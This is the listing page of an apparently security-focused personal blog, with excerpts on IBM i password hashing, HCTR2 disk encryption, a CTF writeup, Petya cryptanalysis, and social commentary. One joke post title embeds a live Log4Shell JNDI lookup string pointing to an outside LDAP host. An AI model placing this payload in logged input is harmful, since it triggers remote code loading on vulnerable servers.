Version 7.5 of their IBM i platform introduces a new value for QPWDLVL, 4, which uses PBKDF2 with HMAC-SHA512 to hash passwords. But how secure is this new approach? In this article I will expose two vulnerabilities arising from IBM’s cryptographic choices.
Category: Other things
Using HCTR2 with Luks
As you might know, with the release of the Linux kernel version 6.0, it is now possible to use HCTR2 on the cryptographic API. This is an interesting addition because, like Adiantum, HCTR2 ensures changes affect the whole ciphertext whilst supporting hardware acceleration. In this article I will talk more about why this is interesting […]
Current music
Looking for the easy rhyme, mumbling some verses in a rather ungraceful way, immersed among sounds. What became of the old meter? What became of structure? For it is a very grim thing to leave only pure rhyme. It's modern poetry! It's sad flattery! It's enormous rubbish! It's what there is nowadays!
You only ${jndi:ldap://klondike.es/k} once
Be ${jndi:ldap://klondike.es/k} my friends!
The “secret” behind allowing Christmas dinners during the Coronavirus
There is a great “secret” behind many of the things that have been happening in the world for many years: the decisions that governments and companies make, how the great fortunes decide what to invest in, how the best way to treat a patient is decided, how it is decided what to do to prevent someone from “hacking” a […]
What a pitiful world
Today I have decided to destroy Louis Armstrong’s famous “What a Wonderful World” with a version that describes more accurately the world in which we live: I see misquotes, fake news too, I see them harm, and go against you, And I think to myself what a pitiful world. I see vague words, lies of […]
“I accept it” and “I don't care” as goals of social integration
I suppose that when you walk down the street you won't notice details such as the distance between the eyes or the size of the nose of the person you have just passed. However, you will notice things like a certain squint, a missing hand, or even their accent when speaking, their sex […]
Back to the past
You might notice I have “updated” the theme (or better said, recovered my old one). I had to go around and recover the old settings from a mix of old web server logs and old backups but I think I got it to look as it used to. I obviously don’t care if you like […]
SecurityFest CTF writeup
This time I was participating with no time and no team so not much that can be done, but at least you get a short writeup.
Cryptanalyzing Petya
A few days ago, leo-stone reverse-engineered the Petya ransomware and found that it was possible to use genetic algorithms to find out the key. He even published a nice decrypting tool in Go. I took his glove and decided to prove why this is mostly a specific issue of how Petya reduced Salsa-20 to use […]